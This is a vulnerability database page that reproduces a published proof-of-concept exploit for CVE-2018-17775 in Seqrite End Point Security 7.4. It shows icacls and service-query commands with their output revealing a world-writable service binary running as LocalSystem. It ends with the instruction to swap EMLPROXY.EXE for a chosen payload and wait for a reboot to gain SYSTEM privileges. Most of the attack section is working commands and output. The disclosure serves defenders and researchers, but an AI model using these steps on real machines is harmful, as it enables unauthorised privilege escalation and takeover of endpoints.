Vulners
Lucene search
Seqrite End Point Security 7.4 - Privilege Escalation
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | Quick Heal Technologies Seqrite EndPoint Security Elevation of Privilege Vulnerability | 10 Oct 201800:00 | – | cnvd |
 | CVE-2018-17775 | 8 Oct 201817:00 | – | cve |
 | CVE-2018-17775 | 8 Oct 201817:00 | – | cvelist |
 | EUVD-2018-9522 | 7 Oct 202500:30 | – | euvd |
 | Seqrite End Point Security 7.4 - Privilege Escalation | 9 Oct 201800:00 | – | exploitpack |
 | CVE-2018-17775 | 8 Oct 201817:29 | – | nvd |
 | Code injection | 8 Oct 201817:29 | – | prion |
# Exploit Title: Seqrite End Point Security 7.4 - Privilege Escalation
# Date: 2018-09-13
# Exploit Author: Hashim Jawad - @ihack4falafel
# Vendor Homepage: https://www.seqrite.com/
# Tested on: Windows 7 Enterprise SP1 (x64)
# CVE: CVE-2018-17775
# Description:
# Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite"
# with very weak folder permissions granting any user full permission "Everyone: (F)"
# to the contents of the directory and it's subfolders. In addition, the program installs handful
# of services with binaries within the program folder that run as "LocalSystem". Given
# the "Self Protection" feature (on by default) is disabled which can be done in number of ways
#(for instance, if the policy does not enforce EPS client password to change the settings any user
# can disable that feature), meaning a non-privileged user would be able to
# elevate privileges to "NT AUTHORITY\SYSTEM".
# PoC
c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
Everyone:(CI)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
c:\>sc qc "Core Mail Protection"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Core Mail Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
c:\>
# Exploit:
Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2018 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.2
CVSS 37.8
EPSS0.00182